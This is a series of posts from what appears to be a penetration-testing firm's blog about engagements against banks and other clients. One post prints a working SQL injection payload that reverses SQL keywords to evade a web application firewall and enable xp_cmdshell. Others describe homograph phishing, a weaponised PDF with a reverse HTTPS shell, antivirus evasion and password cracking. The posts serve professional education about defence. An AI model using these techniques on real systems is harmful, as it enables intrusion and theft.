Monday, June 14, 2010

Security Vulnerability Penetration Assessment Test?

Our philosophy here at Netragard is that security-testing services must produce a threat that is at least equal to the threat that our customers are likely to face in the real world. If we test our customers at a lesser threat level and a higher-level threat attempts to align with their risks, then they will likely suffer a compromise. If they do suffer a compromise, then the money that they spent on testing services might as well be added to the cost in damages that result from the breach.
This is akin to how armor is tested. Armor is designed to protect something from a specific threat. In order to be effective, the armor is exposed to a level of threat that is slightly higher than what it will likely face in the real world. If the armor is penetrated during testing, it is enhanced and hardened until the threat cannot defeat the armor. If armor is penetrated in battle then there are casualties. That class of testing is called Penetration Testing and the level of threat produced has a very significant impact on test quality and results.

What is particularly scary is that many of the security vendors who offer Penetration Testing services either don't know what Penetration Testing is or don’t know the definitions for the terms. Many security vendors confuse Penetration Testing with Vulnerability Assessments and that confusion translates to the customer. The terms are not interchangeable and they do not define methodology, they only define testing class. So before we can explain service quality and threat, we must first properly define services.

Based on the English dictionary the word “Vulnerability” is best defined as susceptibility to harm or attack. Being vulnerable is the state of being exposed. The word “Assessment” is best defined as the means by which the value of something is estimated or determined usually through the process of testing. As such, a “Vulnerability Assessment” is a best estimate as to how susceptible something is to harm or attack.

Lets do the same for “Penetration Test”. The word “Penetration” is best defined as the act of entering into or through something, or the ability to make way into or through something. The word “Test” is best defined as the means by which the presence, quality or genuineness of anything is determined. As such the term “Penetration Test” means to determine the presence of points where something can make its way through or into something else.

Despite what many people think, neither term is specific to Information Technology. Penetration Tests and Vulnerability Assessments existed well before the advent of the microchip. In fact, the ancient Romans used a form of penetration testing to test their armor against various types of projectiles. Today, we perform Structural Vulnerability Assessments against things like the Eiffel Tower, and the Golden Gate Bridge. Vulnerability Assessments are chosen because Structural Penetration Tests would cause damage to, or possibly destroy the structure.

In the physical world Penetration Testing is almost always destructive (at least to a degree), but in the digital world it isn’t destructive when done properly. This is mostly because in the digital world we’re penetrating a virtual boundary and in the physical world we’re penetrating a physical boundary. When you penetrate a virtual boundary you’re not really creating a hole, you’re usually creating a process in memory that can be killed or otherwise removed.

When applied to IT Security, a Vulnerability Assessment isn't as accurate as a Penetration Test. This is because Vulnerability Assessments are best estimates and Penetration Tests either penetrate or they don’t. As such, a quality Vulnerability Assessment report will contain few false positives (false findings) while a quality Penetration Testing report should contain absolutely no false positives. (though they do sometimes contain theoretical findings).

The quality of service is determined by the talent of the team delivering services and by the methodology used for service delivery. A team of research capable ethical hackers that have a background in exploit development and system / network penetration will usually deliver higher quality services than a team of people who are not research capable. If a team claims to be research capable, ask them for example exploit code that they’ve written and ask them for advisories that they’ve published.

Service quality is also directly tied to threat capability. The threat in this case is defined by the capability of real world malicious hackers. If testing services do not produce a threat level that is at least equal to the real world threat, then the services are probably not worth buying. After all, the purpose for security testing is to identify risks so that they can be fixed / patched / eliminated before malicious hackers exploit them. But if the security testing services are less capable than the malicious hacker, then chances are the hacker will find something that the service missed.

Friday, June 11, 2010

We Are Politically Incorrect


Back in February of 2009 we released an article called FaceBook from the hackers perspective. As far as we know, we were the first to publish a detailed article about using Social Networking Websites to deliver surgical Social Engineering attacks. Since that time, we noticed a significant increase in marketing hype around Social Engineering from various other security companies. The problem is that they're not telling you the whole truth.

The whole truth is that Social Engineering is a necessary but potentially dangerous service. Social Engineering at its roots is the act of exploiting the human vulnerability and as such is an offensive and politically incorrect service. If a customer’s business has any pre-existing social or political issues then Social Engineering can be like putting a match to a powder keg. In some cases the damages can be serious and can result in legal action between employee and employer, or visa versa.

It’s for this reason that businesses need to make sure that their environments are conducive to receiving social attacks, and that they are prepared to deal with the emotional consequences that might follow. If employees are trained properly and if security policies are enforced that cover the social vector, then things “should” be ok. If those policies don’t exist and if there’s any internal turmoil, high-risk employees, or potentially delicate political situations, then Social Engineering is probably not such a great idea as it will likely identify and exploit one of those pre-existing issues.

For example, we recently delivered services to a customer that had pre-existing issues but assumed that their environment was safe for testing with Social Engineering. In this particular case the customer had an employee that we’ll call Jane Doe who was running her own business on the side. Jane Doe was advertising her real employers name on her business website making it appear as if there was a relationship between her employer and her business. She was also advertising her business address as her employers address on her FaceBook fan page. From our perspective, Jane Doe was a perfect Social Engineering target.

With this social risk identified, we decided that we’d impersonate Jane Doe and hijack the existing relationships that she had with our customer (her employer). We accomplished this with a specially crafted phishing attack.

The first step in the phish was to collect content for the phishing email. In this case Jane Doe posted images to her FaceBook fan page that included a photo of herself and a copy of her businesses logo. We used those images to create an email that looked like it originated from Jane Doe’s email address at our customers network and was offering the recipient discounted pricing. (Her FaceBook privacy settings were set to allow everybody.)

Once we had the content for the phishing email set up we used an IDN homograph attack to register a new domain that appeared to be identical to our customers domain. For example, if our customer was SNOsoft and their real domain was snosoft.com, the fake domain looked just like “snosoft.com”.

We embedded a link into the phishing email using the fake domain to give it a legitimate look and feel. The link was advertised as the place to click to get information about specially discounted offerings that were specific to our customer’s employees. Of course, the link really pointed to our web server where we were hosting a browser based exploit.

Then we collected email addresses using an enumerator and loaded those into a distribution list. We sent a test email to ourselves first to make sure that everything would render ok. Once our testing was complete, we clicked send and the phish was on its way. Within 15 minutes of delivering the attack our customer called us and requested that all testing be stopped. But by that time, 38 people had already clicked on our embedded URL, and more clicks were on their way.

As it turns out, our customer wasn’t prepared to receive Social Engineering tests despite the fact that they requested them. At first they accused us of being unprofessional because we used Jane Doe’s picture in the phishing email, which was apparently embarrassing to Jane Doe. Then they accused us of being politically incorrect for the same reason.

So we asked our customer, “Do you think that a black-hat would refrain from doing this because it’s politically incorrect?” Then we said, “Imagine if a black-hat launched this attack, and received 38 clicks (and counting).” (Each click representing a potential compromise).

While we can’t go into much more detail for reasons of confidentiality, the phishing attack uncovered other more serious internal and political issues. Because of those issues, we had to discontinue testing and move to report delivery. There was no fault or error on our part as everything was requested and authorized by the customer, but this was certainly a case of the match and the powder keg.

Despite the unfortunate circumstances, the customer did benefit significantly from the services. Specifically, the customer became aware of some very serious social risks that would have been extremely damaging had they been identified and exploited by black-hat hackers. Even if it was a painful process for the customer, we’re happy that we were able to deliver the services as we did because they enabled our customer to reduce their overall risk and exposure profile.

The moral of the story is that businesses should take care and caution when requesting Social Engineering services. They should be prepared for uncomfortable situations and discoveries, and if possible they should train and prepare their employees in advance. In the end it boils down to one of two things. Is it more important for a company to understand their risks or is it more important to avoid embarrassing or offending an employee.

Sunday, May 16, 2010

REVERSE(noitcejnI LQS dnilB) Bank Hacking

Earlier this year we were hired to perform an Overt Web Application Penetration Test for one of our banking customers (did you click that?). This customer is a reoccurring customer and so we know that they have Web Application Firewalls and Network Intrusion Prevention Systems in play. We also know that they are very security savvy and that they respond to attacks promptly and appropriately.


Because this test was Overt in nature (non-stealth) we began testing by configuring Acunetix to use burpsuite-pro as a proxy. Then we ran an automated Web Application Vulnerability Scan with Acunetix and watched the scan populate burpsuite-pro with information. While the scan results were mostly fruitless we were able to pick up with manual testing and burpsuite-pro.

While the automated scans didn’t find anything our manual testing identified an interesting Blind SQL Injection Vulnerability. This blind SQL Injection vulnerability was the only vulnerability that we discovered that had any real potential.

It’s important understand to the difference between standard SQL Injection Vulnerabilities and Blind SQL Injection Vulnerabilities. A standard SQL Injection Vulnerability will return useful error information to the attacker and usually display that information in the attackers web browser. That information helps the attacker debug and refine the attack. Blind SQL Injection Vulnerabilities return nothing, making them much more difficult to exploit.

Since the target Web Application was protected by two different Intrusion Prevention Technologies, and since the vulnerability was a Blind SQL Injection Vulnerability, we knew that exploitation wasn’t going to be easy. To be successful we’d first need to defeat the Network Intrusion Prevention System and then the Web Application Firewall.

Defeating Network Intrusion Prevention Systems is usually fairly easy. The key is to find an attack vector that the Network Intrusion Prevention System can’t monitor. In this case (like most cases) our Web Application’s server accepted connections over SSL (via HTTPS). Because SSL based traffic is encrypted the Network Intrusion Prevention System can’t intercept and analyze the traffic.

Defeating Web Application Firewalls is a bit more challenging. In this case, the Web Application Firewall was the termination point for the SSL traffic and so it didn’t suffer from the same SSL blindness issues that the Network Intrusion Prevention System did. In fact, the Web Application Firewall was detecting and blocking our embedded SQL commands very successfully.

We tried some of the known techniques for bypassing Web Application Firewalls but to no avail. The vendor that makes this particular Web Application Firewall does an excellent job at staying current with the latest methods for bypassing Web Application Firewall technologies.

Then we decided that we’d try attacking backwards. Most SQL databases support a reverse function. That function does just what you’d think that it would do; it returns the reverse of whatever string you feed it. So we wrote our commands backwards and encapsulated then in the reverse() function provided by the SQL server. When we fed our new reversed payloads to the Web Application the Web Application Firewall failed to block the commands.

As it turns out most (maybe all) Web Application Firewalls can be bypassed if you reverse the spelling of your SQL commands. So you’d rewrite “xp_cmdshell” as “llehsdmc_px” and then encapsulate it in the reverse function. As far as we know we’re the first to discover and use this method to successfully bypass a Web Application Firewall.

The next step in the attack was to reconfigure and enable the xp_cmdshell function. The xp_cmdshell is important as it executes a given command string as an operating-system command shell and returns any output rows of text. Simply put, it’s just like sitting at the DOS prompt.

The technique used to reconfigure the xp_cmdshell functionality is well known and well documented. But, since we did it using backwards commands we thought that we would show you what it looked like.

var=1';DECLARE @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE ('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE ('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @c =REVERSE('"moc.dragarten gnip" llehsdmc_px') EXEC (@c);--

The above SQL commands do the following three things:

1-) C:\> show advanced options, 1 \n

Use the “show advanced options” option to display the sp_configure system stored procedure advanced options. When you set show advanced options to 1, you can list the advanced options by using sp_configure. The default is 0. The setting takes effect immediately without a server restart.

2-) C:\> master.dbo.sp_configure xp_cmdshell, 1

This enables the xp_cmdshell functionality in the MsSQL database so that we can execute operating-system commands by calling xp_cmdshell. xp_cmdshell is disabled by default.

3-) C:\> ping netragard.com

Because we were dealing with a Blind SQL Injection Vulnerability we needed a creative way to test that we’d successfully re-enabled the xp_cmdshell function. To do that we set up a sniffer on our outside firewall interface and configured it to alert us when we received pings from our banking customer’s network. Then in the SQL payload (shown above) we included the command “ping netragard.com”. Then when we received ICMP packets from our customers network we knew that our command had been executed successfully.

Now that we had confirmed that our Blind Reversed SQL Injection attack was viable and that we had successfully enabled the xp_cmdshell functionality, the last thing for us to do was to extract database information. But how do we extract database information using a Blind SQL Injection Vulnerability if the vulnerability never returns any information?

That's actually pretty easy. Most databases support conditional statements (if condition then do something). So, we used conditional statements combined with timing to extract database information. Specifically, if table name equals "users" then wait for 3 seconds, if it doesn't then return control immediately. Then if the database doesn't respond for 3 seconds we know that we've guessed the name of one of the tables correctly.

Sure there are other things that we could have done, but we're the good guys.

Monday, April 26, 2010

Netragard Hacking Your Bank

We were recently hired to perform an interesting Advanced Stealth Penetration test for a mid-sized bank. The goal of the penetration test was to penetrate into the bank’s IT Infrastructure and see how far we could get without detection. This is a bit different than most penetration tests as we weren’t tasked with identifying risks as much as we were with demonstrating vulnerability.

The first step of any penetration test is reconnaissance. Reconnaissance is the military term for the passive collection of intelligence about an enemy prior to attacking that enemy. It is technically impossible to effectively attack an enemy without first obtaining actionable intelligence about the enemy. Failure to collect good intelligence can result in significant casualties, unnecessary collateral damage and a completely failed attack. In penetration testing, damages are realized by downed systems and a loss of revenue.

Because this engagement required stealth, we focused on the social attack vectors and Social Reconnaissance. We first targeted FaceBook with our “FaceBook from the hackers perspective“ methodology. That enabled us to map relationships between employees, vendors, friends, family etc. It also enabled us to identify key people in Accounts Receivable / Accounts Payable (“AR/AP”).

In addition to FaceBook, we focused on websites like Monster, Dice, Hot Jobs, LinkedIn, etc. We identified a few interesting IT related job openings that disclosed interesting and useful technical information about the bank. That information included but was not limited to what Intrusion Detection technologies had been deployed, what their primary Operating Systems were for Desktops and Servers, and that they were a Cisco shop.

Naturally, we thought that it was also a good idea to apply for the job to see what else we could learn. To do that, we created a fake resume that was designed to be the “perfect fit” for a “Sr. IT Security Position” (one of the opportunities available). Within one day of submission of our fake resume, we had a telephone screening call scheduled.

We started the screening call with the standard meet and greet, and an explanation of why we were interested in the opportunity. Once we felt that the conversation was flowing smoothly, we began to dig in a bit and start asking various technology questions. In doing so, we learned what Anti-Virus technologies were in use and we also learned what the policies were for controlling outbound network traffic.

That’s all that we needed…

Upon completion of our screening call, we had sufficient information to attempt stealth penetration with a high probability of success. The beauty is that we collected all of this information without sending a single packet to our customer’s network. In summary we learned:

  • That the bank uses Windows XP for most Desktops
  • Who some of the bank’s vendors were (IT Services)
  • The names and email addresses of people in AR/AP
  • What Anti-Virus technology the bank uses
  • Information about the banks traffic control policies

Based on the intelligence that we collected we decided that the ideal scenario for stealth penetration would be to embed an exploit into a PDF document and to send that PDF document to the bank’s AR/AP department from the banks trusted IT Services provider. This attack was designed to exploit the trust that our customer had with their existing IT Services provider.

When we created the PDF, we used the new reverse https payload that was recently released by the Metasploit Project. (Previously we were using similar but more complex techniques for encapsulating our reverse connections in HTTPS). We like reverse HTTPS connections for two reasons:

  • First, Intrusion Detection Technologies cannot monitor encrypted network traffic. Using an encrypted reverse connection ensures that we are protected from the prying eyes of Intrusion Detection Systems and less likely to trip alarms.
  • Second, most companies allow outbound HTTPS (port 443) because its required to view many websites. The reverse HTTPS payload that we used mimics normal web browsing behavior and so is much less likely to set off any Intrusion Detection events.
Before we sent the PDF to the our customer we checked it against the same Antivirus Technology that they were using to ensure that it was not detected as malware or a virus. To evade the scanners we had to “pack” our pseudo-malware in such a way that it would not be detected by the scanners. Once that was done and tested, we were ready to launch our attack.

When we sent the PDF to our customer, it didn’t take long for the victim in AP/AR to open it, after all it appeared to be a trusted invoice. Once it was opened, the victim’s computer was compromised. That resulted in it establishing a reverse connection to our lab which we then tunneled into to take control of the victims computer (all via HTTPS).

Once we had control, our first order of operation was to maintain access. To do this we installed our own backdoor technology onto the victims computer. Our technology also used outbound HTTPS connections, but for authenticated command retrieval. So if our control connection to the victims computer was lost, we could just tell our backdoor to re-establish the connection.

The next order of operation was to deploy our suite of tools on the compromised system and to begin scoping out the internal network. We used selective ARP poisoning as a first method for performing internal reconnaissance. That proved to be very useful as we were able to quickly identify VNC connections and capture VNC authentication packets. As it turns out, the VNC connections that we captured were being made to the Active Directory (“AD”) server.

We were able to crack the VNC password by using a VNC Cracking Tool. Once that happened we were able to access, the AD server and extract the servers SAM file. We then successfully cracked all of the passwords in that file, including the historical user passwords. Once the passwords were cracked, we found that the same credentials were used across multiple systems. As such, we were not only able to access desktops and servers, but also able to access Cisco devices, etc.

In summary, we were able to penetrate into our customers IT Infrastructure and effectively take control of the entire infrastructure without being detected. We accomplished that by avoiding conventional methods for penetration and by using our own unorthodox yet obviously effective penetration methodologies.

This particular engagement was interesting as our customers goal was not to identify all points of risk, but instead was to identify how deeply we could penetrate. Since the engagement, we’ve worked with that customer to help them create barriers for isolation in the event of penetration. Since those barriers have been implemented, we haven’t been able to penetrate as deeply.

As usual, if you have any questions or comments, please leave them on our blog. If there’s anything you’d like us to write about, please email me the suggestion. If I’ve made a grammatical mistake in here… I’m a hacker not an English major.

Tuesday, April 6, 2010

Outbound Traffic Risk and Controlls

Recently one of our customers asked me to provide them with information about the risks of unrestricted or lightly restricted outbound network traffic. As such, I decided to write this blog entry and share it with everyone. While some of the risks behind loose outbound network controls are obvious, others aren’t so obvious. I hope that this blog entry will help to shed some light on the not so obvious risks…

In all networks, there are two general types of network traffic, inbound and outbound. Inbound network traffic is the type of traffic that is generated when an Internet based user makes a network connection to a device that exists in your business infrastructure. Examples of such connections are browsing to your website, establishing a VPN connection, checking email, etc. Outbound network traffic is the type of traffic that is generated when a LAN based user (or a VPN connected user in some cases) makes a network connection to a device somewhere on the Internet.

Just about everyone is familiar with the risks that are associated with the inbound type. Those risks include things like Vulnerable Web Applications, unpatched services running on Internet facing production systems, etc. In fact, most people associate the idea of security with the inbound connection type more so than the outbound type. As a result, they end up leaving the most vulnerable part of their business open to attack.

The truth is that the size of the attack surface for the outbound connection type is considerably larger than that of the inbound connection type. The attack surface is best defined as the sum of all potential risk points for a particular group of targets. In the case of the outbound connection type, the potential risk points include every variant of software installed on every device capable of making outbound connections (and helper applications too). This includes technologies like Adobe Acrobat, Mozilla Firefox, Internet Explorer, Flash, QuickTime, Microsoft Office, Safari, FTP Programs, Security Scanners, Antivirus Technologies, Smartphones, etc.

One example of an attack would be something like this. An employee receives an email containing an interesting blog entry from Netragard, LLC. That email contains a link that points to a malicious payload designed to compromise the employees computer. When the link is clicked, a request is made to download the payload, which results in the employees computer being compromised. Upon compromise the employees computer establishes an outbound *HTTPS connection to the attacker, and the attacker tunnels back in over that connection to take control of the employees computer. In most cases, the employee has no idea that they’ve been compromised, nor does their employer.

*Because the connection is an HTTPS connection IDS/IPS technologies won’t flag it as suspicious nor is it possible to sniff the connection since its encrypted with SSL. (SNOsoft's Jayson Street)

The compromise doesn’t stop at the employees computer. The instant that the employees computer is compromised then the network that the computer is connected to is also compromised. At that point the attacker can use ARP Poisoning to perform Man in the Middle attacks (or other more direct attacks), or just to capture user credentials. Either way distributed metastasis is almost inevitable if the attacker has any semblance of skill. (Thank god Netragard didn’t really embed a malicious link in this blog entry right?).

The good news is that suffering a compromise doesn’t need to be costly or technically damaging. If the proper policies, procedures and controls are in place then a compromise can be relatively harmless from a cost in damages perspective. Outbound connection controls are an example of controls that everyone should have in place.

If outbound connections are restricted to specific protocols and can only be established by authenticated users then attacks like the one described above will be largely ineffective. The outbound controls might not always prevent the users computer from being compromised, but they will usually prevent the users computer from establishing a connection back to the attacker (which will ideally prevent the attacker from taking control of the computer). In such a case, the computer will need to be reinstalled but at least the rest of the network will still be intact.

Sunday, March 28, 2010

Exploit Acquisition Program - More Details

The recent news on Forbes about our Exploit Acquisition Program has generated a lot of interesting speculative controversy and curiosity. As a result, I've decided to take the time to follow up with this blog entry. Here I'll make a best effort to explain what the Exploit Acquisition Program is, why we decided to launch the program, and how the program works.

What it is:

The Exploit Acquisition Program ("EAP") officially started in May of 1999 and is currently being run by Netragard, LLC. EAP specifically designed to acquire "actionable research" in the form of working exploits from the security community. The Exploit Acquisition Program is different than other programs because participants receive significantly higher pay for their work and in most cases the exploits never become public knowledge.

The exploits that are acquired via the EAP are sold directly to specific US based clients that have a unique and justifiable need for such technologies. At no point does Netragard sell or otherwise export acquired exploits to any foreign entities. Nor do we disclose any information about our buyers or about participating researchers.

Why did we start the EAP?

Netragard launched the EAP to give security researchers the opportunity to receive fair value for their research product. Our bidding prices start at or around $15,000 per exploit. That price is affected by many different variables.

How does the EAP Work?

The EAP works as follows:
  1. Researcher contacts Netragard.
  2. Researcher and Netragard execute a Mutual Nondisclosure Agreement.
  3. Researcher provides a verifiable form of identification to Netragard.
  4. Researcher fills out an Exploit Acquisition Form ("EAF").
  5. Netragard works with the buyer to determine exploit value based on the information provided in the EAF.
  6. Researcher accepts or rejects the price. Note: If rejected, the process stops here.
  7. Researcher submits the exploit code and vulnerability details to Netragard.
  8. Netragard verifies that the exploit works as advertised.
  9. If the exploit does not work as advertised then the researcher is given the opportunity to resolve the issue(s).
  10. If the exploit does work as advertised then the purchase agreement is delivered to the researcher.
  11. Researcher executes purchase agreement and transfers all rights and ownership of the exploit and any information related to the exploit to Netragard. At this point researcher loses all rights to the exploit and its respective information.
  12. Netragard begins the payment process.
  13. Payments are issued in three equal installments over the course of three months.
EAP Rules
  1. Netragard requires exclusivity for all exploits purchased through the EAP.
  2. Ownership of the exploit and its respective vulnerability information are transferred from researcher to Netragard at step 11 above. Prior to step 11 the exploit and its respective vulnerability information are the intellectual property of the researcher. If at any point before step 11 the researcher terminates the acquisition process then Netragard will destroy any and all information related to failed transaction. Termination of sale is not possible after step 11.
  3. Netragard will not identify its buyers.
  4. Netragard will not identify researchers.
  5. All transactions between buyer, Netragard and developer are done legally and contractually. At no point will Netragard engage in illegal activity or with unknown, untrusted, and/or unverifiable sources or entities.
If you are interested in selling your exploit to us, please contact us at eap@netragard.com.

Thursday, March 4, 2010

Professional Script Kiddies vs Real Talent

The Good Guys in the security world are no different from the Bad Guys; most of them are nothing more than glorified Script Kidies. The fact of the matter is that if you took all of the self-proclaimed hackers in the world and you subjected them to a litmus test, very few would pass as acutal hackers.

This is true for both sides of the so called Black and White hat coin. In the Black Hat world, you have script-kids who download programs that are written by other people then use those programs to “hack” into networks. The White Hat’s do the exact same thing; only they buy the expensive tools instead of downloading them for free. Or maybe they’re actually paying for the pretty GUI, who knows?

What is pitiable is that in just about all cases these script kiddies have no idea what the programs actually do. Sometimes that’s because they don’t bother to look at the code, but most of the time its because they just can’t understand it. If you think about it that that is scary. Do you really want to work with a security company that launches attacks against your network with tools that they do not fully understand? I sure wouldn’t.

This is part of the reason why I feel that it is so important for any professional security services provider to maintain an active research team. I’m not talking about doing market research and pretending that its security research like so many security companies do. I’m talking about doing actual vulnerability research and exploit development to help educate people about risks for the purposes of defense. After all, if a security company can’t write an exploit then what business do they have launching exploits against your company?

I am very proud to say that Everything Channel recently released the 2010 CRN Security Researchers list and that Netragard’s Kevin Finisterre was on the list. Other people that were included in the list are people that I have the utmost respect for. As far as I am concerned, these are some of the best guys in the industry: (clearly this list is not all inclusive and in no way includes all of the people that deserve credit for their contributions and/or talent).

  • Dino Dai Zovi
  • Kevin Finisterre
  • Landon Fuller
  • Robert Graham
  • Jeremiah Grossman
  • Larry Highsmith
  • Billy Hoffman
  • Mikko Hypponen
  • Dan Kaminsky
  • Paul Kocher
  • Nate Lawson
  • David Litchfield
  • Charles Miller
  • Jeff Moss
  • Jose Nazario
  • Joanna Rutkowska

In the end I suppose it all boils down to what the customer wants. Some customers want to know their risks; others just want to put a check in the box. For those who want to know what their real risks are, you’ve come to the right place.

Monday, October 12, 2009

Hosted Solutions – A Hackers Haven

Human beings are lazy by nature. If there is a choice to be made between a complicated technology solution and an easy technology solution, then nine times out of ten people will choose the easy solution. The problem is that the easy solutions are often riddled with hidden risks and those risks can end up costing the consumer more money in damages then what might be saved by using the easy solution.

The advantages of using a managed hosting provider to host your email, website, telephone systems, etc, are clear. When you outsource critical infrastructure components you save money. The savings are quickly realized because you no longer need to spend money running a full scale IT operation. In many cases, you don’t even need to worry about purchasing hardware, software, or even hiring IT staff to support the infrastructure.

What isn’t clear to most people is the serious risk that outsourcing can introduce to their business. In nearly all cases a business will have a radically lower risk and exposure profile if they keep everything in-house. This is true because of the substantial attack surface that hosting providers have when compared to in-house IT environments.

For example, a web-hosting provider might host 1,000 websites across 50 physical servers. If one of those websites contains a single vulnerability and that vulnerability is exploited by a hacker then the hacker will likely take control of the entire server. At that point the hacker will have successfully compromised and taken control of all 50 websites with a single attack.

In non-hosted environments there might be only one Internet facing website as opposed to the 1000 that exist in a hosted environment. As such the attack surface for this example would be 1000 times greater in a hosted environment than it is in a non-hosted environment. In a hosted environment the risks that other customers introduce to the infrastructure also become your risk. In a non-hosted environment you are only impacted by your own risks.

To make matters worse, many people assume that such a risk isn’t significant because they do not use their hosted systems for any critical transactions. They fail to consider the fact that the hacker can modify the contents of the compromised system. These modifications can involve redirecting online banking portal links, credit card form posting links, or even to spread infectious malware. While this is true for any compromised system, the chances of suffering a compromise in a hosted environment are much greater than in a non-hosted environment.

Tuesday, September 22, 2009

Social Engineering – It’s Nothing New

With all the recent hype about Social Engineering we figured that we’d chime in and tell people what’s really going on. The fact is that Social Engineering is nothing more than a Confidence Trick being carried out by a Con Artist. The only difference between the term Social Engineering and Confidence Trick is that Social Engineering is predominately used with relation to technology.

So what is it really? Social Engineering is the act of exploiting a person’s natural tendency to trust another person or entity. Because the vulnerability exists within people, there is no truly effective method for remediation. That is not to say that you cannot protect your sensitive data, but it is to say that you cannot always prevent your people or even yourself from being successfully conned.

The core ingredients required to perform a successful confidence trick are no different today then they were before the advent of the Internet. The con artist must have the victim’s trust, and then trick the victim into performing an action or divulging information. The Internet certainly didn’t create the risk but it does make it easier for the threat to align with the risk.

Before the advent of the Internet the con artist (threat) needed to contact the victim (risk) via telephone, in person, via snail mail, etc. Once contact was made a good story needed to be put into place and the victim’s trust needed to be earned. That process could take months or even years and even then success isn’t guaranteed.

The advent of the Internet provided the threat with many more avenues’ through which it could successfully align with the risk. Specifically, the Internet enables the threat to align with hundreds or even thousands of risks simultaneously. That sort of shotgun approach couldn’t be done before and significantly increases an attackers chances of success. One of the most elementary examples of this shotgun approach is the email based phishing attack.

The email based phishing attack doesn’t earn the trust of its victims; it steals trust from existing relationships. Those relationships might exist between the victim and their bank, family member, co-worker, employer, etc. In all instances the email based phishing attack hinges on the attacker’s ability to send emails that look like they are coming from a trusted source (exploitation of trust). From a technical perspective, email spoofing and phishing is trivial (click here for a more sophisticated attack example).

The reason why it is possible for an attacker to steal trust from a victim instead of earning that trust is because “face to face” trust isn’t portable to the Internet. For example, most people trust their spouse. Many people talk to their spouse on AIM, MSN, Yahoo, Skype, etc. while at work. How do they know that they are really chatting with their spouse and not a hacker?

So how do you protect against the social risks and prevent the threat from successfully aligning with those risks? The truth is that you can't. Con artists have been conning people since the dawn of man. The better question what are you doing to protect your data from the hacker that does penetrate into your IT Infrastructure?



Friday, July 24, 2009

Why “DISSECTING THE HACK: The F0rb1dd3n Network” was written. By: Jayson E. Street

Note: This blog entry was written by Jayson E. Street and published on his behalf.

The consumer, the corporate executive, and the government official. Regardless of your perspective, DISSECTING THE HACK: The F0rb1dd3n Network was written to illustrate the issues of Information Security through story. We all tell stories. In fact, we do our best communicating through stories. This book illustrates how very real twenty-first century threats are woven into the daily lives of people in different walks of life.

Three kids in Houston, Texas. A mid-level Swiss businessman traveling abroad. A technical support worker with a gambling problem. An international criminal who will do anything for a profit (and maybe other motives). FBI agents trying to unravel a dangerous puzzle. A widower-engineer just trying to survive. These are just some of the lives brought together in a story of espionage, friendship, puzzles, hacks, and more. Every attack is real. We even tell you how some of these attack are done. And we tell you how to defend against varied attacks as well.

DISSECTING THE HACK: The F0rb1dd3n Network is a two-part work. The first half is a story that can be read by itself. The second half is a technical reference work that can also be read alone. But together, each provides texture and context for the other. The technical reference – called the STAR or “Security Threats Are Real” – explains the “how” and “why” behind much of the story. STAR addresses technical material, policy issues, hacker culture context, and even explains “Easter Eggs” in the story.

This book is the product of a community of Information Security professionals. It is written to illustrate how we are all interesting targets for various reasons. We may be a source of money for criminals through fraud, we might have computing resources that can be used to launch attacks on someone else, or we may be responsible for protecting valuable information. The reasons we are attacked are legion – and so are the ways we are attacked. Our goal is to raise awareness in a community of people who are under-served. Few of us really want dry lectures about how we should act to protect ourselves. But stories of criminals, corporate espionage, friendship and a little juvenile delinquency – now that is the way to learn.